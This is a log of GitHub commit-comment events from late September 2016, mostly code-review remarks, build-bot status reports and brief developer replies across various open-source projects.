{"id":"4638754447","type":"CommitCommentEvent","actor":{"login":"JReyLBC"},"repo":{"name":"robscodebase/azo"},"payload":{"comment":{"id":19227912,"position":12,"line":12,"path":"productBlockParser.go","commit_id":"66460644e6464245955f55e27b964ba8e5feab4a","created_at":"2016-09-29T17:33:22Z","updated_at":"2016-09-29T17:33:22Z","body":"Do you want to panic on every error you get? Probably not.\r\n\r\nPanic is used for cases where the error is a programmer error, and they should technically never happen, unless something crazy happens. The reason being is that, to the user of your program, a stack trace means nothing, but rather causes confusion and frustration. \r\n\r\nIt's better to have meaningful error messages that are succinct and give the user an idea of what went wrong, and how to fix it. Stack traces only mean something to the programmer, so consider your audience when handling errors."}},"created_at":"2016-09-29T17:33:22Z"}
{"id":"4638755686","type":"CommitCommentEvent","actor":{"login":"falsvoy"},"repo":{"name":"falsvoy/1_typo"},"payload":{"comment":{"id":19227917,"position":null,"line":null,"path":null,"commit_id":"87834d80fb0635f5f69de7b14c22b97704415084","created_at":"2016-09-29T17:33:37Z","updated_at":"2016-09-29T17:33:37Z","body":"исправлено!"}},"created_at":"2016-09-29T17:33:37Z"}
{"id":"4638757427","type":"CommitCommentEvent","actor":{"login":"JohanEngelen"},"repo":{"name":"weka-io/ldc"},"payload":{"comment":{"id":19227923,"position":24,"line":111,"path":"driver/linker.cpp","commit_id":"c1fadc936a12ce544064f94912daeee4c36079b7","created_at":"2016-09-29T17:33:56Z","updated_at":"2016-09-29T17:33:56Z","body":"you don't need to explain what LTO does, thank you.\r\nIt's just an arbitrary choice really what to use for the plugin optimization level. I chose what's convenient for now (public interface of optimizer.h) and it matches with our machine codegen setting. Whatever, it's not important."}},"created_at":"2016-09-29T17:33:56Z"}
{"id":"4638759351","type":"CommitCommentEvent","actor":{"login":"waymondo"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":19227934,"position":null,"line":null,"path":null,"commit_id":"4273e837bdc60d831012838d398f95c28d6ef311","created_at":"2016-09-29T17:34:16Z","updated_at":"2016-09-29T17:34:16Z","body":"This blows up my emacs initialization. With just:\r\n\r\n```(use-package magit :ensure t)```\r\n\r\nI get:\r\n\r\n```\r\nWarning (initialization): An error occurred while loading ‘/Users/justintalbott/.emacs.d/init.el’:\r\n\r\nSymbol's value as variable is void: with-editor-file-name-history-exclude\r\n```"}},"created_at":"2016-09-29T17:34:16Z"}
{"id":"4638765589","type":"CommitCommentEvent","actor":{"login":"chenx-bob"},"repo":{"name":"chenx-bob/chenx-bob.github.io"},"payload":{"comment":{"id":19227946,"position":null,"line":null,"path":null,"commit_id":"ae892367fb0d59ae6939a15de4bbf185b65b7cdb","created_at":"2016-09-29T17:35:24Z","updated_at":"2016-09-29T17:35:24Z","body":"gg"}},"created_at":"2016-09-29T17:35:24Z"}
{"id":"4638769906","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19227959,"position":null,"line":null,"path":null,"commit_id":"d453f01b196f30e5587ecc51943459049ca2bbe9","created_at":"2016-09-29T17:36:10Z","updated_at":"2016-09-29T17:36:10Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 283](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1270&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **SUCCESS**\nSummary: Running Build time: 00:28:02"}},"created_at":"2016-09-29T17:36:10Z"}
{"id":"4638771976","type":"CommitCommentEvent","actor":{"login":"JReyLBC"},"repo":{"name":"robscodebase/azo"},"payload":{"comment":{"id":19227965,"position":30,"line":30,"path":"productBlockParser.go","commit_id":"66460644e6464245955f55e27b964ba8e5feab4a","created_at":"2016-09-29T17:36:31Z","updated_at":"2016-09-29T17:36:31Z","body":"These return strings don't deserve to be in a function. \r\n\r\nRemember, functions and methods generally represent **actions**. This function could be replaced by two well-named constants.\r\n\r\nAlso consider that function calls introduce overhead into your code. Normally it's no big deal, but unnecessary function calls should be eliminated.\r\n"}},"created_at":"2016-09-29T17:36:31Z"}
{"id":"4638772851","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19227967,"position":null,"line":null,"path":null,"commit_id":"55d9dbe6db93bff38485546cc28b77f81739b56a","created_at":"2016-09-29T17:36:40Z","updated_at":"2016-09-29T17:36:40Z","body":"That is wrong, the commit that ifdef's symver out fixes this..."}},"created_at":"2016-09-29T17:36:40Z"}
{"id":"4638776133","type":"CommitCommentEvent","actor":{"login":"qubitrenegade"},"repo":{"name":"chef-training/site_config"},"payload":{"comment":{"id":19227976,"position":null,"line":null,"path":null,"commit_id":"48aec61e7987597c508dd9a99a12b17ac2ef07b8","created_at":"2016-09-29T17:37:13Z","updated_at":"2016-09-29T17:37:13Z","body":"This only resolves the errors about the missing metadata file, you're still left with two foodcritic failures:\r\n\r\n    FC011: Missing README in markdown format: test/README.md:1\r\n    FC023: Prefer conditional attributes: ./test/recipes/default_test.rb:8\r\n\r\nConfirmed on both ChefDK 17.17 and 18.30"}},"created_at":"2016-09-29T17:37:13Z"}
{"id":"4638778813","type":"CommitCommentEvent","actor":{"login":"dbatiste"},"repo":{"name":"PolymerElements/iron-iconset-svg"},"payload":{"comment":{"id":19227987,"position":64,"line":203,"path":"iron-iconset-svg.html","commit_id":"c989f1b4daf6629e9a052402fa06424505ba324f","created_at":"2016-09-29T17:37:42Z","updated_at":"2016-09-29T17:37:42Z","body":"@cdata : I have a use-case with iconsets containing a large mix of icons that require mirroring and icons that don't.  To avoid unnecessary calls to `getComputedStyle` for non-RTL icons, it seems as though the `getComputedStyle` check could be moved inside of this conditional block.  What are your thoughts on that?\r\n\r\nThe `rtl-mirroring` attribute could still be used to avoid all these checks for consumers that don't care about RTL.  On the other hand, perhaps that attribute is not really needed if the `getComputedStyle` check is moved as described - it would mean all icons would get the check for `mirror-in-rtl` however.\r\n\r\nCheers,\r\nDave"}},"created_at":"2016-09-29T17:37:42Z"}
{"id":"4638783074","type":"CommitCommentEvent","actor":{"login":"kanytu"},"repo":{"name":"tiagoposse/lifemanager"},"payload":{"comment":{"id":19227999,"position":87,"line":83,"path":"src/containers/UtilitiesContainer.jsx","commit_id":"d60a67b98aafd46ab074ec9cf435d8bd6fd4bc4e","created_at":"2016-09-29T17:38:28Z","updated_at":"2016-09-29T17:38:28Z","body":"Avoid using ifs without brackets. This reduces possible mistakes as the well known Apple gogo fail"}},"created_at":"2016-09-29T17:38:28Z"}
{"id":"4638785822","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":19228005,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-29T17:38:58Z","updated_at":"2016-09-29T17:38:58Z","body":"It is software coded HDR"}},"created_at":"2016-09-29T17:38:58Z"}
{"id":"4638788019","type":"CommitCommentEvent","actor":{"login":"JReyLBC"},"repo":{"name":"robscodebase/azo"},"payload":{"comment":{"id":19228008,"position":86,"line":86,"path":"productBlockParser.go","commit_id":"66460644e6464245955f55e27b964ba8e5feab4a","created_at":"2016-09-29T17:39:22Z","updated_at":"2016-09-29T17:39:22Z","body":"If it's not necessary to convert this to a string here, you should leave the return type as []byte. Let the caller convert it if he/she wants to. By converting it a string from the beginning, you're assuming the caller wants the data type to be immutable, and you are charging the overhead for the conversion up front. What if the caller doesn't want the return type to be immutable? Then they have to convert it back into a byte slice, and you have two conversions for no reason."}},"created_at":"2016-09-29T17:39:22Z"}
{"id":"4638789171","type":"CommitCommentEvent","actor":{"login":"sevoku"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19228010,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-29T17:39:33Z","updated_at":"2016-09-29T17:39:33Z","body":"@elsupergomez I had no time to verify it on Fedora, but 4f01caadc02436c68a72be6740e0f1ae132a05e0 should have fixed it."}},"created_at":"2016-09-29T17:39:33Z"}
{"id":"4638789313","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19228012,"position":36,"line":76,"path":"libselinux/src/Makefile","commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T17:39:35Z","updated_at":"2016-09-29T17:39:35Z","body":"No, its really gcc verses clang... I guess ill export compiler flavor instead."}},"created_at":"2016-09-29T17:39:35Z"}
{"id":"4638792630","type":"CommitCommentEvent","actor":{"login":"Tasanar"},"repo":{"name":"ServUO/ServUO"},"payload":{"comment":{"id":19228019,"position":null,"line":null,"path":null,"commit_id":"255f58c2109edf1e069ee588696233eedc9e783d","created_at":"2016-09-29T17:40:12Z","updated_at":"2016-09-29T17:40:12Z","body":"Crimson cincture can be, LT sash replica can be, all non vet reward ROBES can be.\r\n\r\nShrouds can not.\r\n\r\nIf it does not have an exact garg opposite it can not.\r\n\r\n\r\nNot all artficats can be, but some can.\r\n\r\nCrimson Cincture and LT guard replica sash."}},"created_at":"2016-09-29T17:40:12Z"}
{"id":"4638793650","type":"CommitCommentEvent","actor":{"login":"lionel-m"},"repo":{"name":"contao/docs"},"payload":{"comment":{"id":19228021,"position":25,"line":58,"path":"manual/de/01-installation/contao-installieren.md","commit_id":"9fb1e4597b9ef47268a61079489eb334d08c6b37","created_at":"2016-09-29T17:40:22Z","updated_at":"2016-09-29T17:40:22Z","body":"@aschempp:\r\n\r\nphp composer.phar -> composer"}},"created_at":"2016-09-29T17:40:22Z"}
{"id":"4638794221","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19228028,"position":42,"line":82,"path":"libselinux/src/Makefile","commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T17:40:28Z","updated_at":"2016-09-29T17:40:28Z","body":"libpcre is there..."}},"created_at":"2016-09-29T17:40:28Z"}
{"id":"4638794679","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19228030,"position":null,"line":null,"path":null,"commit_id":"ccf72fcf02745334e45e7f5e8ae55c09fd3a00cf","created_at":"2016-09-29T17:40:33Z","updated_at":"2016-09-29T17:40:33Z","body":"Why not sprt [0,4]?  Good luck!"}},"created_at":"2016-09-29T17:40:33Z"}
{"id":"4638795200","type":"CommitCommentEvent","actor":{"login":"charlesfrantz"},"repo":{"name":"gus/gocql"},"payload":{"comment":{"id":19228032,"position":4,"line":64,"path":"cluster.go","commit_id":"8b4a22a50a6a5e04240a23048bf34cf9fe08cba9","created_at":"2016-09-29T17:40:39Z","updated_at":"2016-09-29T17:40:39Z","body":"s/discoverya/discovery"}},"created_at":"2016-09-29T17:40:39Z"}
{"id":"4638795461","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark-Script"},"payload":{"comment":{"id":19228033,"position":null,"line":null,"path":null,"commit_id":"474e1eb905495b2160c43203dbed81631385bd05","created_at":"2016-09-29T17:40:41Z","updated_at":"2016-09-29T17:40:41Z","body":"This update actually refers to this issue: https://github.com/Mottie/GitHub-userscripts/issues/11."}},"created_at":"2016-09-29T17:40:41Z"}
{"id":"4638795827","type":"CommitCommentEvent","actor":{"login":"lionel-m"},"repo":{"name":"contao/docs"},"payload":{"comment":{"id":19228035,"position":5,"line":35,"path":"manual/de/01-installation/contao-installieren.md","commit_id":"9fb1e4597b9ef47268a61079489eb334d08c6b37","created_at":"2016-09-29T17:40:45Z","updated_at":"2016-09-29T17:40:45Z","body":"Mac OS X -> macOS"}},"created_at":"2016-09-29T17:40:45Z"}
{"id":"4638797150","type":"CommitCommentEvent","actor":{"login":"philiplindberg"},"repo":{"name":"pespantelis/vue-typeahead"},"payload":{"comment":{"id":19228040,"position":null,"line":null,"path":null,"commit_id":"4dc1536388d7e32c1295ea13b35b8210627553b3","created_at":"2016-09-29T17:40:59Z","updated_at":"2016-09-29T17:40:59Z","body":"Hey pespantelis,\r\n\r\nI'm curious why a trailing slash should be added if it's missing from the \"src\"? \r\n\r\nI just deployed my vuejs app to production with your plugin enabled (great plugin by the way), and I was getting 301 redirect errors because of the endpoint trailing slash. The issue was fixed when I removed the committed code above.\r\n\r\nHave you come across this issue on production environments? "}},"created_at":"2016-09-29T17:40:59Z"}
{"id":"4638798978","type":"CommitCommentEvent","actor":{"login":"B0116"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":19228042,"position":4,"line":5,"path":"CHANGES","commit_id":"156e34f21d15ba5dbf0995ab57bc7214ba291b05","created_at":"2016-09-29T17:41:18Z","updated_at":"2016-09-29T17:41:18Z","body":"Delete"}},"created_at":"2016-09-29T17:41:18Z"}
{"id":"4638799824","type":"CommitCommentEvent","actor":{"login":"dhaligas"},"repo":{"name":"xamarin/GoogleApisForiOSComponents"},"payload":{"comment":{"id":19228045,"position":null,"line":null,"path":null,"commit_id":"4110d5570c36b1637ff2b0aba1653175ae828d8d","created_at":"2016-09-29T17:41:28Z","updated_at":"2016-09-29T17:41:28Z","body":"ok thanks .. I will try out the new version .. has this been pushed to nuget? @bholmes "}},"created_at":"2016-09-29T17:41:28Z"}
{"id":"4638801628","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19228053,"position":40,"line":39,"path":"libselinux/utils/Makefile","commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T17:41:47Z","updated_at":"2016-09-29T17:41:47Z","body":"I thought the same thing, but then you have left comments, like on PCRE_FLAGS,  that you need to have defaults at each level if their not set...."}},"created_at":"2016-09-29T17:41:47Z"}
{"id":"4638803038","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19228054,"position":null,"line":null,"path":null,"commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T17:42:02Z","updated_at":"2016-09-29T17:42:02Z","body":"No longer valid, didn't update the message."}},"created_at":"2016-09-29T17:42:02Z"}
{"id":"4638805217","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19228058,"position":null,"line":null,"path":null,"commit_id":"ccf72fcf02745334e45e7f5e8ae55c09fd3a00cf","created_at":"2016-09-29T17:42:23Z","updated_at":"2016-09-29T17:42:23Z","body":"I forgot :-("}},"created_at":"2016-09-29T17:42:23Z"}
{"id":"4638806184","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19228062,"position":null,"line":null,"path":null,"commit_id":"323798dbfe0163d55fb38a8816e0a4d7ef7d331b","created_at":"2016-09-29T17:42:33Z","updated_at":"2016-09-29T17:42:33Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IZ9MalzuRU-cvDPui_9lNg"}},"created_at":"2016-09-29T17:42:33Z"}
{"id":"4638807927","type":"CommitCommentEvent","actor":{"login":"charlesfrantz"},"repo":{"name":"gus/gocql"},"payload":{"comment":{"id":19228067,"position":14,"line":131,"path":"cluster.go","commit_id":"8b4a22a50a6a5e04240a23048bf34cf9fe08cba9","created_at":"2016-09-29T17:42:52Z","updated_at":"2016-09-29T17:42:52Z","body":"s/will/that will"}},"created_at":"2016-09-29T17:42:52Z"}
{"id":"4638810322","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19228070,"position":null,"line":null,"path":null,"commit_id":"bb3ea4225b91aac735c483c214f3471653813a49","created_at":"2016-09-29T17:43:17Z","updated_at":"2016-09-29T17:43:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#bxep6w_sT0eKPPtZDz33Cw"}},"created_at":"2016-09-29T17:43:17Z"}
{"id":"4638813890","type":"CommitCommentEvent","actor":{"login":"lionel-m"},"repo":{"name":"contao/docs"},"payload":{"comment":{"id":19228078,"position":4,"line":34,"path":"manual/de/01-installation/contao-installieren.md","commit_id":"9fb1e4597b9ef47268a61079489eb334d08c6b37","created_at":"2016-09-29T17:43:54Z","updated_at":"2016-09-29T17:43:54Z","body":"I also change a little the beginning of this paragraph since it is now before the explanation for installing Composer."}},"created_at":"2016-09-29T17:43:54Z"}
{"id":"4638814812","type":"CommitCommentEvent","actor":{"login":"cgifford99"},"repo":{"name":"cgifford99/Sudoku-Solver"},"payload":{"comment":{"id":19228081,"position":null,"line":null,"path":null,"commit_id":"4fd712ae73b8f2ffd4356513e8213479c346ee66","created_at":"2016-09-29T17:44:05Z","updated_at":"2016-09-29T17:44:05Z","body":"'Version 0.1.0.1' meant to be 'Version 0.1.0.2'"}},"created_at":"2016-09-29T17:44:05Z"}
{"id":"4638816001","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"sgdc3/XlsToSql"},"payload":{"comment":{"id":19228084,"position":7,"line":7,"path":"src/main/java/com/github/sgdc3/xlstosql/utils/StringUtils.java","commit_id":"c70312572f7eed334f03e623d83a53e5b7bf60e6","created_at":"2016-09-29T17:44:18Z","updated_at":"2016-09-29T17:44:18Z","body":"This was a beautiful addition (imho) to the JDK 8, by the way :) [String#join](https://docs.oracle.com/javase/8/docs/api/java/lang/String.html#join-java.lang.CharSequence-java.lang.Iterable-)"}},"created_at":"2016-09-29T17:44:18Z"}
{"id":"4638818037","type":"CommitCommentEvent","actor":{"login":"salix5"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":19228095,"position":null,"line":null,"path":null,"commit_id":"c4bc9cad9e9b3c071526446515d45ac5b4fd2eb9","created_at":"2016-09-29T17:44:39Z","updated_at":"2016-09-29T17:44:39Z","body":"567b9ad63d61b54e86c9fc37fef2c8706cbc6979\r\n我的想法是：\r\n主要的問題出在太多函數都會修改operation_param\r\n目前的嘗試是把operation_param限制只讓move_car()和discard_deck()這兩類的卡片移動使用\r\n原本使用operation_param的都改成新的參數\r\n"}},"created_at":"2016-09-29T17:44:39Z"}
{"id":"4638833736","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19228117,"position":null,"line":null,"path":null,"commit_id":"efce78bc946ce268ca9ef75a12d4f022cd1c7d4c","created_at":"2016-09-29T17:47:11Z","updated_at":"2016-09-29T17:47:11Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2299 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.07%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T17:47:11Z"}
{"id":"4638834123","type":"CommitCommentEvent","actor":{"login":"niksedk"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19228118,"position":null,"line":null,"path":null,"commit_id":"e0b49e8fc3a9757c3fe9017a1190937f5ef3cdc8","created_at":"2016-09-29T17:47:13Z","updated_at":"2016-09-29T17:47:13Z","body":"@xylographe: exactly, thx :)\r\nHad trouble finding out where \"PackagesConfig\" was defined..."}},"created_at":"2016-09-29T17:47:13Z"}
{"id":"4638834276","type":"CommitCommentEvent","actor":{"login":"parag-rs"},"repo":{"name":"parag-rs/testsvnproj"},"payload":{"comment":{"id":19228119,"position":null,"line":null,"path":null,"commit_id":"61f831249ae5cf168549ddb8731fddb59f8b6805","created_at":"2016-09-29T17:47:15Z","updated_at":"2016-09-29T17:47:15Z","body":"delte"}},"created_at":"2016-09-29T17:47:15Z"}
{"id":"4638835101","type":"CommitCommentEvent","actor":{"login":"jamstooks"},"repo":{"name":"AASHE/hub"},"payload":{"comment":{"id":19228125,"position":null,"line":null,"path":null,"commit_id":"0dafcb882319087b363d6f8d418073f0e4298b7c","created_at":"2016-09-29T17:47:23Z","updated_at":"2016-09-29T17:47:23Z","body":"fixes #400;"}},"created_at":"2016-09-29T17:47:23Z"}
{"id":"4638836747","type":"CommitCommentEvent","actor":{"login":"samhinshaw"},"repo":{"name":"STAT545-UBC/STAT545-UBC.github.io"},"payload":{"comment":{"id":19228129,"position":86,"line":73,"path":"block010_dplyr-end-single-table.rmd","commit_id":"18554c25b60cc63bc881ab4718d89353369bc4ca","created_at":"2016-09-29T17:47:40Z","updated_at":"2016-09-29T17:47:40Z","body":"Note to self: This has confused some students. \r\ncanada - data.frame\r\nCanada - country level in my_gap\r\ncanada - mutated column in new my_gap that is set to NULL afterwards\r\n\r\nPerhaps name the \"canada\"  data.frame \"canadaDF\" and the transient \"canada\" column \"canadaGDPrep\""}},"created_at":"2016-09-29T17:47:40Z"}
{"id":"4638837819","type":"CommitCommentEvent","actor":{"login":"rolandshoemaker"},"repo":{"name":"letsencrypt/boulder"},"payload":{"comment":{"id":19228131,"position":20,"line":555,"path":"sa/sa.go","commit_id":"f5052b8032277fbc9b0125befa315e4f83e989aa","created_at":"2016-09-29T17:47:51Z","updated_at":"2016-09-29T17:47:51Z","body":"You should include a `sql.ErrNoRows` check here instead of the nil check below as `SelectOne` has slightly different 'not found' semantics than `Get`."}},"created_at":"2016-09-29T17:47:51Z"}
{"id":"4638846271","type":"CommitCommentEvent","actor":{"login":"rolandshoemaker"},"repo":{"name":"letsencrypt/boulder"},"payload":{"comment":{"id":19228146,"position":6,"line":542,"path":"sa/sa.go","commit_id":"f5052b8032277fbc9b0125befa315e4f83e989aa","created_at":"2016-09-29T17:49:22Z","updated_at":"2016-09-29T17:49:22Z","body":"Since `SelectOne` accepts an interface it might make sense to move the query out of the `if/else` block and instead use that block to assign the correct model type to a `interface`, this also would remove the need for assigning to the `statusObj` var."}},"created_at":"2016-09-29T17:49:22Z"}
{"id":"4638852787","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"zonque/simple-alsa-loop"},"payload":{"comment":{"id":19228169,"position":null,"line":null,"path":null,"commit_id":"bf790dc68005efd659106c21eed14440e67cca67","created_at":"2016-09-29T17:50:32Z","updated_at":"2016-09-29T17:50:32Z","body":"Hi, zonque!\r\n\r\nWould you kindly explain:\r\n\r\nsnd_pcm_readi() and snd_pcm_writei() are nonblock in your case?\r\n\r\nBest wishes, Xdevelnet"}},"created_at":"2016-09-29T17:50:32Z"}
{"id":"4638854951","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19228174,"position":null,"line":null,"path":null,"commit_id":"4d18f595dcc9ce6f7431d8f66e39774ce6256503","created_at":"2016-09-29T17:50:53Z","updated_at":"2016-09-29T17:50:53Z","body":"It was of course not intended that way, I just assumed that shift<Right> shifts right and not up and right...\r\nI have a further attempt, I hope I implemented shift<Right> correctly, it looked ok from command line."}},"created_at":"2016-09-29T17:50:53Z"}
{"id":"4638857916","type":"CommitCommentEvent","actor":{"login":"ArseniyShestakov"},"repo":{"name":"Chocimier/vcmi"},"payload":{"comment":{"id":19228183,"position":null,"line":null,"path":null,"commit_id":"381882b6d8b20998aa5abda1cb15618e48ea8a9f","created_at":"2016-09-29T17:51:24Z","updated_at":"2016-09-29T17:51:24Z","body":"Yeah It's shoud really be reparate request from ::newTurn. The only problem is that I have no full picture of how this code works actually."}},"created_at":"2016-09-29T17:51:24Z"}
{"id":"4638861475","type":"CommitCommentEvent","actor":{"login":"GMSyrimis"},"repo":{"name":"jwplayer/jwplayer-android-best-practice-apps"},"payload":{"comment":{"id":19228190,"position":13,"line":13,"path":"360-video-sample/README.md","commit_id":"012d9c1f171a7a205e6134ba81b4b7cbccd8db70","created_at":"2016-09-29T17:51:59Z","updated_at":"2016-09-29T17:51:59Z","body":"Steps 2 and 3 are the same. Also, when you download the http://demo.jwplayer.com/android/360/jwplayer-vr-sdk.zip\r\n\r\nIt is a zip file, so I imaging when the docs say to rename it, you mean not to extract the files, but to rename the actual file. We should explain why this is the case."}},"created_at":"2016-09-29T17:51:59Z"}
{"id":"4638862323","type":"CommitCommentEvent","actor":{"login":"kylefleming"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19228198,"position":null,"line":null,"path":null,"commit_id":"8c1546831629da0444b02257190e6921e78cefac","created_at":"2016-09-29T17:52:08Z","updated_at":"2016-09-29T17:52:08Z","body":"I actually only removed the readme from the \"compile sources\" in the project settings, it's still in the list of files on the left :)\r\n\r\nThis way you can still edit it easily, but it doesn't give you a warning that it doesn't know how to compile it."}},"created_at":"2016-09-29T17:52:08Z"}
{"id":"4638863288","type":"CommitCommentEvent","actor":{"login":"GMSyrimis"},"repo":{"name":"jwplayer/jwplayer-android-best-practice-apps"},"payload":{"comment":{"id":19228201,"position":14,"line":14,"path":"360-video-sample/README.md","commit_id":"012d9c1f171a7a205e6134ba81b4b7cbccd8db70","created_at":"2016-09-29T17:52:17Z","updated_at":"2016-09-29T17:52:17Z","body":"Where is base.aar and common.aar?"}},"created_at":"2016-09-29T17:52:17Z"}
{"id":"4638863749","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19228202,"position":null,"line":null,"path":null,"commit_id":"5693cebc05a23cad7569acdd03135771d70cfd1b","created_at":"2016-09-29T17:52:22Z","updated_at":"2016-09-29T17:52:22Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/73e65a6213ea81e77eed1e6cea518dd2a9162a47/source/docs/assets/css/main.css)\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/5d5b72972628f6751b581860233f775d8a5925b3/source/docs/assets/js/main.js)\n- [source/docs/assets/t1commands.json](https://github.com/pantheon-systems/documentation/commit/5d5b72972628f6751b581860233f775d8a5925b3/source/docs/assets/t1commands.json)\n- [Gruntfile.js](https://github.com/pantheon-systems/documentation/commit/5693cebc05a23cad7569acdd03135771d70cfd1b/Gruntfile.js)\n- [package.json](https://github.com/pantheon-systems/documentation/commit/5693cebc05a23cad7569acdd03135771d70cfd1b/package.json)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/5693cebc05a23cad7569acdd03135771d70cfd1b/source/_partials/footer_scripts.html)\n"}},"created_at":"2016-09-29T17:52:22Z"}
{"id":"4638865260","type":"CommitCommentEvent","actor":{"login":"gpduck"},"repo":{"name":"gpduck/PSCommonSql"},"payload":{"comment":{"id":19228206,"position":null,"line":null,"path":null,"commit_id":"b186e394255d6625f6709c99b98b9ec1731d5bbe","created_at":"2016-09-29T17:52:34Z","updated_at":"2016-09-29T17:52:34Z","body":"Fixes #2 "}},"created_at":"2016-09-29T17:52:34Z"}
{"id":"4638870816","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19228217,"position":null,"line":null,"path":null,"commit_id":"dfdae75fea380b7d6f7c446b7fff7c05c83eab6f","created_at":"2016-09-29T17:53:30Z","updated_at":"2016-09-29T17:53:30Z","body":"No, they're good. That function I put back in is just for the selection window of spawnview.py, not related to the actual scan locations themselves. Thanks :)"}},"created_at":"2016-09-29T17:53:30Z"}
{"id":"4638871257","type":"CommitCommentEvent","actor":{"login":"ZinChen"},"repo":{"name":"ZinChen/durak-card-game"},"payload":{"comment":{"id":19228218,"position":null,"line":null,"path":null,"commit_id":"99c586e451cb937d90db05f3265a9cbe996d58a9","created_at":"2016-09-29T17:53:34Z","updated_at":"2016-09-29T17:53:34Z","body":"Привет Прохор, выставь свой правильный имейл, чтобы твой аккаунт тут отображался, через git config --global user.email \"<твой@мэйл.ru>\""}},"created_at":"2016-09-29T17:53:34Z"}
{"id":"4638873749","type":"CommitCommentEvent","actor":{"login":"rossi2000"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19228224,"position":null,"line":null,"path":null,"commit_id":"4f3fde42d054b1ddc1acf9b5260c6ec19ce71fcb","created_at":"2016-09-29T17:54:00Z","updated_at":"2016-09-29T17:54:00Z","body":"its not a copy of anyones menus. ok.\r\nit was created between me and a member of obh.\r\n\r\nwhats a lot of streaming stuff in tuner config?  I don't see any at all in there on a vix install."}},"created_at":"2016-09-29T17:54:00Z"}
{"id":"4638873862","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"sgdc3/XlsToSql"},"payload":{"comment":{"id":19228225,"position":7,"line":7,"path":"src/main/java/com/github/sgdc3/xlstosql/utils/StringUtils.java","commit_id":"c70312572f7eed334f03e623d83a53e5b7bf60e6","created_at":"2016-09-29T17:54:01Z","updated_at":"2016-09-29T17:54:01Z","body":"Good to know ;) Thanks"}},"created_at":"2016-09-29T17:54:01Z"}
